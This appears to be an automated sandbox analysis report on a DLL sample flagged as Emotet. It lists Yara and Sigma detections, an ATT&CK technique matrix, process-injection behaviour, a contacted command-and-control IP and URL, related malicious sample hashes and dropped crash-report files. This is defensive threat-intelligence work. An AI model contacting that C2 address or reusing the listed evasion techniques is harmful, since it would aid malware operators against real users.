                      Source: Yara matchFile source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection112Masquerading21OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerSecurity Software Discovery51SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemSystem Information Discovery24Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532312 Sample: efELSMI5R4 Startdate: 02/12/2021 Architecture: WINDOWS Score: 88 52 Sigma detected: Emotet RunDLL32 Process Creation 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected Emotet 2->56 8 loaddll32.exe 1 2->8         started        10 svchost.exe 2->10         started        13 svchost.exe 3 8 2->13         started        15 5 other processes 2->15 process3 signatures4 17 rundll32.exe 2 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        30 3 other processes 8->30 58 Changes security center settings (notifications, updates, antivirus, firewall) 10->58 24 MpCmdRun.exe 1 10->24         started        26 WerFault.exe 13->26         started        28 WerFault.exe 13->28         started        process5 signatures6 50 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->50 32 rundll32.exe 17->32         started        34 rundll32.exe 20->34         started        36 rundll32.exe 22->36         started        38 conhost.exe 24->38         started        40 rundll32.exe 30->40         started        process7 process8 42 rundll32.exe 32->42         started        46 rundll32.exe 34->46         started        dnsIp9 48 45.63.5.129, 443, 49815 AS-CHOOPAUS United States 42->48 60 System process connects to network (likely due to code injection or exploit) 42->60 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      efELSMI5R4.dll20%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.c30000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      5.2.rundll32.exe.860000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.c50000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      26.2.rundll32.exe.9a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.770000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.35a0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.0.loaddll32.exe.1100000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      2.2.loaddll32.exe.1100000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://45.63.5.129/fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://45.63.5.129/fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://upx.sf.netAmcache.hve.22.drfalse
                        		high
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001C.00000003.673502580.00000214D5202000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673473376.00000214D4D91000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673436832.00000214D4DA8000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673407994.00000214D4DA8000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://help.disneyplus.com.svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://disneyplus.com/legal.svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        45.63.5.129
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532312
                        Start date:02.12.2021
                        Start time:00:42:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 12m 36s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:efELSMI5R4 (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:33
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal88.troj.evad.winDLL@41/21@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 21.3% (good quality ratio 20.1%)
                        • Quality average: 71.2%
                        • Quality standard deviation: 25.5%
                        HCA Information:
                        • Successful, ratio: 83%
                        • Number of executed functions: 57
                        • Number of non-executed functions: 168
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        00:44:15API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                        00:45:46API Interceptor1x Sleep call for process: WerFault.exe modified
                        00:46:11API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        AS-CHOOPAUSImSL42AOtZ.exeGet hashmaliciousBrowse
                        • 45.63.36.79
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 66.42.57.149
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 66.42.57.149
                        iU17wh2uUd.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        iU17wh2uUd.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        Sz4lxTmH7r.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        RFIlSRQKzj.exeGet hashmaliciousBrowse
                        • 45.32.115.235
                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        MMUc2aeWxZ.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        0pvsj0MF1D.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        Linux_amd64Get hashmaliciousBrowse
                        • 45.32.162.141
                        nkXzJnW7AH.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        67MPsax8fd.exeGet hashmaliciousBrowse
                        • 136.244.117.138
                        Linux_x86Get hashmaliciousBrowse
                        • 45.77.44.252
                        uI6mJo4TJQ.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        uI6mJo4TJQ.exeGet hashmaliciousBrowse
                        • 149.28.253.196
                        M2jG6lMe7Y.exeGet hashmaliciousBrowse
                        • 202.182.120.6
                        7LPqKhiPCL.exeGet hashmaliciousBrowse
                        • 139.180.133.9

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        51c64c77e60f3980eea90869b68c58a8TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        fehiVK2JSx.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        kQ9HU0gKVH.exeGet hashmaliciousBrowse
                        • 45.63.5.129
                        gvtdsqavfej.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        mhOX6jll6x.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        dguQYT8p8j.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        jSxIzXfwc7.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        mhOX6jll6x.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        X2XCewI2Yy.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        dguQYT8p8j.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        HMvjzUYq2h.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        s9BZBDWmi4.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        bFx5bZRC6P.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        c7IUEh66u6.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        HMvjzUYq2h.dllGet hashmaliciousBrowse
                        • 45.63.5.129
                        s9BZBDWmi4.dllGet hashmaliciousBrowse
                        • 45.63.5.129

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8c5962cbbdb13a8671f1f3c3793157e73bd5d897_d70d8aa6_09efe6a1\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6754551774972452
                        Encrypted:false
                        SSDEEP:96:P7/jKZqyHy9hkoyt7JfapXIQcQ5c6A2cE2cw33+a+z+HbHgIVG4rmMOyWZAXGng/:TLoB2HnM28jj8q/u7siS274ItW
                        MD5:519B12A445EE049708691A6E7B16C4CA
                        SHA1:32D3A6E3661935CF9AEAFC9935DAC440FA484D4C
                        SHA-256:6276E8D1AEC9B8964A389F6231360F7450B4B4AEC72C8B28669E03DEE8C93A80
                        SHA-512:C9590F7441E08FCBA300D11638AED1A292523B9D6C8C1AE23493AE97FE056DD3DFA181239057BF09453973D1D3630373D51F35A69A0534B4E149FDDB7EDAB600
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.3.3.0.3.4.0.7.8.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.a.d.d.f.c.5.-.9.a.a.7.-.4.9.9.6.-.8.7.4.4.-.5.7.8.c.4.d.6.5.6.4.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.9.4.6.9.6.8.-.d.a.d.b.-.4.d.6.8.-.9.5.a.e.-.f.7.9.6.0.5.f.3.2.3.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.4.-.0.0.0.1.-.0.0.1.c.-.3.2.1.2.-.1.1.a.3.5.8.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_17200f86\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:modified
                        Size (bytes):65536
                        Entropy (8bit):0.6786083513367968
                        Encrypted:false
                        SSDEEP:96:y6FFJjKZqycy9hk1Dg3fWpXIQcQec6kxcEicw3DH+a+z+HbHgIVG4rmMOyWZAXGA:xF3oB0HQ4xoXj8q/u7siS274ItW
                        MD5:CCD4E670F6E0FD8F16CEA2A17AE5D3B6
                        SHA1:0FA826EAD3722AFBBA9C30D364A36C6D7962E95F
                        SHA-256:F47E9FFC535B549A1F0B11E7EC861A733F99D950299EE6A73B00A722FF623387
                        SHA-512:7E9789D95CC820652B262FA01FFE14DFA25E8A55E956F1299BC1C83ED99CE9FD50255D7BE4B011D71B7677C11B6E5DAC15DF6E62B9988E7857F119CD181A7A4F
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.3.4.0.3.6.5.6.8.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.0.8.3.4.5.1.6.2.5.4.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.6.d.0.6.5.0.-.b.d.0.5.-.4.1.9.2.-.9.e.1.0.-.3.2.1.7.9.a.7.b.8.6.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.d.9.b.6.c.0.-.b.0.d.6.-.4.7.a.9.-.8.0.e.2.-.a.c.b.9.f.3.d.9.2.4.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.4.-.0.0.0.1.-.0.0.1.c.-.3.2.1.2.-.1.1.a.3.5.8.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER20B.tmp.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4558
                        Entropy (8bit):4.4286066367901995
                        Encrypted:false
                        SSDEEP:48:cvIwSD8zspJgtWI9PfWSC8B4a8fm8M4J2yGtFgV+q84tj9tKcQIcQwQud:uITf7QOSNuJEWx9tKkwQud
                        MD5:36DC4E2BDC01D672F8486704401DF7C3
                        SHA1:AF97460BC10F8446A011F7F0F9C6F2B12C8540C0
                        SHA-256:9C05BE63346A1C2FA16AC8F9DE7CC6398F05CC44F153FF6D57C844D56A4A0B7F
                        SHA-512:8DCFF5650ECE5641F52761CDA51CF83BBD14EA15F80F15E5D02D0E31B6887E57BB0858C10B99AA7BE3A49CB7A07FBEA37B5B91A3F9820C613AA79AAEA2B185A6
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2267.tmp.csv
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):51112
                        Entropy (8bit):3.0656805850873763
                        Encrypted:false
                        SSDEEP:1536:Q7H6JWZtd0Mtf2loP4kSLpN7Fe+UHq9oq:Q7H6JWZtd0Mtf2loP4kSLz7Fe+UHq9oq
                        MD5:E91A2899D6B45701430454485E57F9AD
                        SHA1:25B8A43DD9F2C0D30B6E0892DB7693ABFFF52DC5
                        SHA-256:BB511E8DFAC2A05923CC2215B0A42DAB18852307FBFC808A69521D88F526DD4B
                        SHA-512:D3C8BD472241D8E7CF869F72DF2DBE71EB31D2718AC023B6A52E8389904F8817B31E2AB47034E9BF220D9073F2FDB31EF5E20F6AADD0E5C4CDF628729BF2EF32
                        Malicious:false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2650.tmp.txt
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13340
                        Entropy (8bit):2.6957637466701168
                        Encrypted:false
                        SSDEEP:96:9GiZYWnClduRYoYxWfA2HCUYEZGCtCiDvOoxkWwtw2IaQihdMobIiY3:9jZDnb/QHCPaQihdMoUiY3
                        MD5:BB5A0508F1DC906444E12D7FF7C0B47C
                        SHA1:A8180F31565DED2FAAB9D05F8CD2E6D4E3A4A365
                        SHA-256:1675E0F2B4EE5B40E2EBE5996A7D72A2414A5E942B0CE4D9EE1809C27782617E
                        SHA-512:E16E490851A32B342FB3B3BD112E4C5C445590FE1F641F4B9A094AC218A299A3299BD75F6CB56E6DB95C2AD69F7A28318093147460CBD168A7FA862FC63E1D48
                        Malicious:false
